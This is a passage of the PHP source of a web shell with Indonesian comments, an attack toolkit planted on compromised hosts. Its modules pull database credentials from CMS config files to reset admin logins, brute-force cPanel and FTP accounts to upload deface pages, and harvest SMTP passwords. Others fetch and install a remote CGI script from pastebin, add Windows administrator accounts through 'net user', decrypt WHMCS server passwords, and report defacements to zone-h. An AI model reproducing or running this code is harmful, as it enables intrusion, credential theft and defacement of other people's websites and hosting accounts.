"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config,""); $dbuser = ambilkata($config,""); $dbpass = ambilkata($config,""); $dbname = ambilkata($config,""); $dbprefix = ambilkata($config,""); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/admin/
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Magento
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => OpenCart
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => error, gabisa ambil nama domain nyaa
"; if($target2 == '') { $url_target2 = "Login => error, gabisa ambil nama domain nyaa
"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf."
"; echo "CMS => Lokomedia
"; if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } } } } else { echo "

Auto Edit User Config

DIR Config:


Set User & Pass:


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } }elseif($_GET['do'] == 'shelscan') { echo'

Shell Finder



'; if (isset($_POST["scan"])) { $url = $_POST['traget']; echo "
Scanning ".$url."

"; echo "Result :
"; $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php", "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php", "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php", "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php", "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php", "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#", "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php", "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php", "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php", "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php", "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar", "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php", "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php", "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php", "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz", "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error", "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/", "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php", "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/", "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl", "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php", "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php", "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/", "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php", "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php"); foreach ($shells as $shell){ $headers = get_headers("$url$shell"); // if (eregi('200', $headers[0])) { echo "$url$shell Done :D


"; // $dz = fopen('shells.txt', 'a+'); $suck = "$url$shell"; fwrite($dz, $suck."\n"); } } echo "Shell [ shells.txt ]"; } } elseif($_GET['do'] == 'cpanel') { if($_POST['crack']) { $usercp = explode("\r\n", $_POST['user_cp']); $passcp = explode("\r\n", $_POST['pass_cp']); $i = 0; foreach($usercp as $ucp) { foreach($passcp as $pcp) { if(@mysql_connect('localhost', $ucp, $pcp)) { if($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; $i++; echo "username ($ucp) password ($pcp)
"; } } } } if($i == 0) { } else { echo "
Nemu ".$i." Cpanel by Mr.ToKeiChun69"; } } else { echo "
USER:

PASS:

NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'smtp') { echo "
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

"; function scj($dir) { $dira = scandir($dir); foreach($dira as $dirb) { if(!is_file("$dir/$dirb")) continue; $ambil = file_get_contents("$dir/$dirb"); $ambil = str_replace("$", "", $ambil); if(preg_match("/JConfig|joomla/", $ambil)) { $smtp_host = ambilkata($ambil,"smtphost = '","'"); $smtp_auth = ambilkata($ambil,"smtpauth = '","'"); $smtp_user = ambilkata($ambil,"smtpuser = '","'"); $smtp_pass = ambilkata($ambil,"smtppass = '","'"); $smtp_port = ambilkata($ambil,"smtpport = '","'"); $smtp_secure = ambilkata($ambil,"smtpsecure = '","'"); echo "SMTP Host: $smtp_host
"; echo "SMTP port: $smtp_port
"; echo "SMTP user: $smtp_user
"; echo "SMTP pass: $smtp_pass
"; echo "SMTP auth: $smtp_auth
"; echo "SMTP secure: $smtp_secure

"; } } } $smpt_hunter = scj($dir); echo $smpt_hunter; } elseif($_GET['do'] == 'auto_wp') { if($_POST['hajar']) { $title = htmlspecialchars($_POST['new_title']); $pn_title = str_replace(" ", "-", $title); if($_POST['cek_edit'] == "Y") { $script = $_POST['edit_content']; } else { $script = $title; } $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."posts"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'"); $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'"); echo "
"; if($target == '') { echo "URL: error, gabisa ambil nama domain nya -> "; } else { echo "URL: $target/?p=$id -> "; } if(!$update OR !$conn OR !$db) { echo "MySQL Error: ".mysql_error()."
"; } else { echo "sukses di ganti.
"; } echo "
"; mysql_close($conn); } } } else { echo "

Auto Edit Title+Content WordPress

DIR Config:


Set Title:


Edit Content?: YN
Jika pilih Y masukin script defacemu ( saran yang simple aja ), kalo pilih N gausah di isi.


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'zoneh') { if($_POST['submit']) { $domain = explode("\r\n", $_POST['url']); $nick = $_POST['nick']; echo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
"; echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

"; function zoneh($url,$nick) { $ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send"); return curl_exec($ch); curl_close($ch); } foreach($domain as $url) { $zoneh = zoneh($url,$nick); if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) { echo "$url -> OK
"; } else { echo "$url -> ERROR
"; } } } else { echo "
Defacer:

Domains:

"; } echo "
"; }elseif($_GET['do'] == 'cpftp_auto') { if($_POST['crack']) { $usercp = explode("\r\n", $_POST['user_cp']); $passcp = explode("\r\n", $_POST['pass_cp']); $i = 0; foreach($usercp as $ucp) { foreach($passcp as $pcp) { if(@mysql_connect('localhost', $ucp, $pcp)) { if($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; if($ucp == '' || $pcp == '') { // } else { echo "[+] username ($ucp) password ($pcp)
"; $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST'])); $ftp_login = ftp_login($ftp_conn, $ucp, $pcp); if((!$ftp_login) || (!$ftp_conn)) { echo "[+] Login Gagal

"; } else { echo "[+] Login Sukses
"; $fi = htmlspecialchars($_POST['file_deface']); $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY); if($deface) { $i++; echo "[+] Deface Sukses
"; if(function_exists('posix_getpwuid')) { $domain_cp = file_get_contents("/etc/named.conf"); if($domain_cp == '') { echo "[+] gabisa ambil nama domain nya

"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp); foreach($domains_cp[1] as $dj) { $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_cp_url = $user_cp_url['name']; if($user_cp_url == $ucp) { echo "[+] http://$dj/$fi

"; break; } } } } else { echo "[+] gabisa ambil nama domain nya

"; } } else { echo "[-] Deface Gagal

"; } } //echo "username ($ucp) password ($pcp)
"; } } } } } if($i == 0) { } else { echo "
Sukses Deface ".$i." Cpanel by Mr.ToKeiChun69."; } } else { echo "
Filename:

Deface Page:

USER:

PASS:

NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'cgi') { $cgi_dir = mkdir('cgi', 0755); $file_cgi = "cgi/cgi.izo"; $isi_htcgi = "AddHandler cgi-script .izo"; $htcgi = fopen(".htaccess", "w"); fwrite($htcgi, $isi_htcgi); fclose($htcgi); $cgi_script = getsource("https://pastebin.com/raw.php?i=amaDeGWf"); $cgi = fopen($file_cgi, "w"); fwrite($cgi, $cgi_script); fclose($cgi); chmod($file_cgi, 0755); echo ""; } elseif($_GET['do'] == 'fake_root') { ob_start(); function reverse($url) { $ch = curl_init("http://domains.yougetsignal.com/domains.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) )))); $array = explode(",,", $resp); unset($array[0]); foreach($array as $lnk) { $lnk = "http://$lnk"; $lnk = str_replace(",", "", $lnk); echo $lnk."\n"; ob_flush(); flush(); } curl_close($ch); } function cek($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $resp = curl_exec($ch); return $resp; } $cwd = getcwd(); $ambil_user = explode("/", $cwd); $user = $ambil_user[2]; if($_POST['reverse']) { $site = explode("\r\n", $_POST['url']); $file = $_POST['file']; foreach($site as $url) { $cek = cek("$url/~$user/$file"); if(preg_match("/hacked/i", $cek)) { echo "URL: $url/~$user/$file -> Fake Root!
"; } } } else { echo "
Filename:

User:

Domain:


NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.
"; } } elseif($_GET['do'] == 'tool') { echo "
"; echo ""; echo "
"; } elseif($_GET['do'] == 'manjat') { echo "
"; echo ""; echo "
"; echo "
"; $d0mains = @file('/etc/named.conf'); $domains = scandir("/var/named"); if ($domains or $d0mains) { $domains = scandir("/var/named"); if($domains) { echo ""; $count=1; $dc = 0; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $dirz = '/home/'.$owner['name'].'/cpanel3-skel'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/lol/'.$owner['name'].'.txt'); $p=file_get_contents(''.$path.'/lol/'.$owner['name'].'.txt'); $password=entre2v2($p,'password="','"'); echo ""; $dc++; } } } echo '
COUNT DOMAIN USER
".$count++."".$domain."".$owner['name']."".$password."
'; $total = $dc; echo '
Total WHM User Found = '.$total.'
'; echo '
'; }else{ $d0mains = @file('/etc/named.conf'); if($d0mains) { echo ""; $count=1; $dc = 0; $mck = array(); foreach($d0mains as $d0main){ if(@eregi('zone',$d0main)){ preg_match_all('#zone "(.*)"#',$d0main,$domain); flush(); if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0]; } } } $mck = array_unique($mck); $usr = array(); $dmn = array(); foreach($mck as $o) { $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o)); $usr[] = $infos['name']; $dmn[] = $o; } array_multisort($usr,$dmn); $dt = file('/etc/passwd'); $passwd = array(); foreach($dt as $d) { $r = explode(':',$d); if(strpos($r[5],'home')) { $passwd[$r[0]] = $r[5]; } } $l=0; $j=1; foreach($usr as $r) { $dirz = '/home/'.$r.'/cpanel3-skel'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/lol/'.$r.'.txt'); $p=file_get_contents(''.$path.'/lol/'.$r.'.txt'); $password=entre2v2($p,'password="','"'); echo ""; $dc++; flush(); $l=$l?0:1; $j++; } } } echo '
COUNT DOMAIN USER
".$count++."'.$dmn[$j-1].' '.$r."".$password."
'; $total = $dc; echo '
Total WHM Account Found = '.$total.'
'; echo '
'; } } } elseif($_GET['do'] == 'smtp') { echo "
"; echo ""; echo "
"; echo"



VHosts SMTP Grabber


"; $ya=$_POST['go']; $co=$_POST['sites']; if($ya){ $e=explode("\r\n",$co); foreach($e as $bda){ //echo '
'.$bda; $linkof=''; $dn=($bda).($linkof); $file=@file_get_contents($dn); if(preg_match("/JConfig|joomla/", $file)) { echo'
----------------------------------------------
'; echo "SMTP USER : ".findit($file,"smtpuser = '","'")."
"; echo "SMTP PASS : ".findit($file,"smtppass = '","'")."
"; echo "SMTP HOST : ".findit($file,"smtphost = '","'")."
"; echo "SMTP PORT : ".findit($file,"smtpport = '","'")."
"; echo "SMTP AUTH : ".findit($file,"smtpauth = '","'")."
"; echo "SMTP SECURE : ".findit($file,"smtpsecure = '","'")."
"; } else{echo "
".$bda." ----> There is no SMTP
";} echo'
----------------------------------------------
'; } } } elseif($_GET['do'] == 'scdc') { echo "
"; echo ""; echo "
"; $text = $_POST['code']; echo"

Script Encode and Decode





"; $submit = $_POST['submit']; if (isset($submit)) { $op = $_POST["ope"]; switch ($op) { case 'base64': $codi = base64_encode($text); break; case 'str': $codi = (base64_encode(str_rot13(gzdeflate(str_rot13($text))))); break; case 'gzinflate': $codi = base64_encode(gzdeflate(str_rot13($text))); break; default: break; } } $submit = $_POST['submits']; if (isset($submit)) { $op = $_POST["ope"]; switch ($op) { case 'base64': $codi = base64_decode($text); break; case 'str': $codi = str_rot13(gzinflate(str_rot13(base64_decode(($text))))); break; case 'gzinflate': $codi = str_rot13(gzinflate(base64_decode($text))); break; default: break; } } echo "


"; } elseif($_GET['do'] == 'csrf') { echo "
"; echo ""; echo "
"; echo"
CSRF ONLINE

"; $url = $_POST['target']; $pf = $_POST['array']; $terkuncyihh = $_POST['kunci']; if($terkuncyihh) { echo "
"; echo ""; echo "
"; $all = array(); // domain finder. $d0mains = file('/etc/named.conf'); $domains = scandir("/var/named"); if($domains or $d0mains){ $count = 0; if($domains){ echo "

Count Domains on user



"; $cur = array(); foreach($domains as $domain){ if(strpos($domain, '.db')){ $dom = str_replace('.db', '', $domain); $own = posix_getpwuid(fileowner("/etc/valiases/$dom")); $user = $own['name']; $all[$user][] = $dom; //echo "$user: $dom
"; } } echo ""; } elseif($d0mains){ $mck = array(); foreach($d0mains as $domain){ preg_match_all('#zone "(.*)"#',$domain,$dom); flush(); if(strlen(trim($domain[1][0])) >2){ $mck[] = $dom[1][0]; } } $mck = array_unique($mck); foreach($mck as $dom){ $own = posix_getpwuid(fileowner("/etc/valiases/$dom")); $user = $own['name']; $all[$user][] = $dom; //echo "$user: $dom
"; } echo ""; } } foreach($all as $user => $domain){ echo "
User $user has ".count($domain)." Domains below :
"; echo "
---------------
"; foreach($domain as $v){ echo "
http://$v
"; } echo "
---------------"; echo "

"; } } elseif($_GET['do'] == 'wpes') { echo "
"; echo ""; echo "
"; if($_POST['auto_deface_wp']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", ); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\r\n", $_POST['link']); $script = htmlspecialchars($_POST['script']); $user = "bahari"; $pass = "bahari"; $passx = md5($pass); foreach($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { echo "Error, Cant edit the user :(
"; } else { echo "Done >> $target
User : bahari
Password : bahari
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { } } } else { echo "

WordPress Auto Edit User

Link Config:

"; } } elseif($_GET['do'] == 'rdp') { echo "
"; echo ""; echo "
"; if(strtolower(substr(PHP_OS, 0, 3)) === 'win') { if($_POST['create']) { $user = htmlspecialchars($_POST['user']); $pass = htmlspecialchars($_POST['pass']); if(preg_match("/$user/", exe("net user"))) { echo "[INFO] -> user $user sudah ada"; } else { $add_user = exe("net user $user $pass /add"); $add_groups1 = exe("net localgroup Administrators $user /add"); $add_groups2 = exe("net localgroup Administrator $user /add"); $add_groups3 = exe("net localgroup Administrateur $user /add"); echo "
[ RDP ACCOUNT INFO ]
------------------------------
IP: ".$ip."
Username: $user
Password: $pass
------------------------------

[ STATUS ]
------------------------------
"; if($add_user) { echo "[add user] -> Berhasil
"; } else { echo "[add user] -> Gagal
"; } if($add_groups1) { echo "[add localgroup Administrators] -> Berhasil
"; } elseif($add_groups2) { echo "[add localgroup Administrator] -> Berhasil
"; } elseif($add_groups3) { echo "[add localgroup Administrateur] -> Berhasil
"; } else { echo "[add localgroup] -> Gagal
"; } echo "------------------------------
"; } } elseif($_POST['s_opsi']) { $user = htmlspecialchars($_POST['r_user']); if($_POST['opsi'] == '1') { $cek = exe("net user $user"); echo "Checking username $user ....... "; if(preg_match("/$user/", $cek)) { echo "[ Sudah ada ]
------------------------------

$cek
"; } else { echo "[ belum ada ]"; } } elseif($_POST['opsi'] == '2') { $cek = exe("net user $user indoxploit"); if(preg_match("/$user/", exe("net user"))) { echo "[change password: indoxploit] -> "; if($cek) { echo "Berhasil"; } else { echo "Gagal"; } } else { echo "[INFO] -> user $user belum ada"; } } elseif($_POST['opsi'] == '3') { $cek = exe("net user $user /DELETE"); if(preg_match("/$user/", exe("net user"))) { echo "[remove user: $user] -> "; if($cek) { echo "Berhasil"; } else { echo "Gagal"; } } else { echo "[INFO] -> user $user belum ada"; } } else { // } } else { echo "
-- Create RDP --
-- Option --
"; } } else { echo "Fitur ini hanya dapat digunakan dalam Windows Server."; } } elseif($_GET['do'] == 'tetangga') { echo "
"; echo ""; echo "
"; echo "
Reverse Domain ip Lookup
"; echo "
"; echo "

"; if(isset($_GET["setan"])) { $site = $_GET["setan"]; $setan = "http://domains.yougetsignal.com/domains.php"; //Curl Function $ch = curl_init($setan); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$site&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) )))); $array = explode(",,", $resp); unset($array[0]); echo ""; foreach($array as $lnk) { print ""; } echo "
$lnk
"; curl_close($ch); } } elseif($_GET['do'] == 'whmcs') { echo "
"; echo ""; echo "
"; echo"




WHMCS DECODER

db_host
db_username
db_password
db_name
cc_encryption_hash

"; $perawan = $_POST['anu1']; $kimcil = $_POST['anu2']; $janda = $_POST['anu3']; $hotel = $_POST['anu4']; $kondom = $_POST['anu5']; @mysql_connect($perawan, $kimcil, $janda); @mysql_select_db($hotel); $cc_encryption_hash = $kondom; function dec($string, $cc_encryption_hash) { $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash); $hash_key = _hash($key); $hash_length = strlen($hash_key); $string = base64_decode($string); $tmp_iv = substr($string, 0, $hash_length); $string = substr($string, $hash_length, strlen($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv.= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen($string)) { if (($c != 0 AND $c % $hash_length == 0)) { $key = _hash($key . substr($out, $c - $hash_length, $hash_length)); } $out.= chr(ord($key[$c % $hash_length]) ^ ord($string[$c])); ++$c; } return $out; } function _hash($string) { $hash = (function_exists('sha1')) ? sha1($string) : md5($string); $out = ''; $c = 0; while ($c < strlen($hash)) { $out.= chr(hexdec($hash[$c] . $hash[$c + 1])); $c+= 2; } return $out; } ######## GO TO HELL ######## ##### :D ########### :D ##### if (isset($_POST['plapon'])) { $query = mysql_query("SELECT *FROM tblservers"); echo "

"; if (!is_array(mysql_fetch_array($query))) { echo ""; } while ($v = mysql_fetch_array($query)) { echo ""; } echo "
HOST ROOT
TYPE ACTIVE HOSTNAME IP ADDRESS USERNAME PASSWORD ACCESS HASH
Nothing Found !
{$v['type']} {$v['active']} {$v['hostname']} {$v['ipaddress']} {$v['username']} " . dec($v['password'], $cc_encryption_hash) . " {$v['accesshash']}
"; $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'vmuserxx' or username = 'vmuser' or username = 'admin' or username = 'Admin' or username = 'administrator' or username = 'Administrator' order by domainstatus"); echo "

"; if (!is_array(mysql_fetch_array($query))) { echo ""; } while ($v = mysql_fetch_array($query)) { echo ""; } echo "
CLIENTS ROOT
DOMAIN STATUS USERNAME PASSWORD DEDICATED IP ASSIGNED IP
Nothing Found ! :(
{$v['domain']} {$v['domainstatus']} {$v['username']} " . dec($v['password'], $cc_encryption_hash) . " {$v['dedicatedip']} {$v['assignedips']}
